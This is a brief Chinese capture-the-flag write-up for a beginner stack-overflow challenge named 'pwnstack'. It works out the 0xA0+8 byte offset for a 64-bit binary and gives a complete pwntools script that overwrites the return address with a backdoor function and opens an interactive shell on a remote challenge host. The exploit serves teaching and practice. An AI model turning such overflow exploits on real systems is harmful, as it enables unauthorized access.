难度1
pwnstack
题解
可以溢出的buf长度为160,即0xA0,die检测64位程序,因此溢出长度为0xA0+8
backdoor函数溢出后调用地址0x400763。
from pwn import *
p = remote("61.147.171.105", 62912)
payload = b'a' * 0xA0 + b'a' * 8
payload += p64(0x00400763)
p.recvline()
p.send(payload)
p.interactive()
文章评论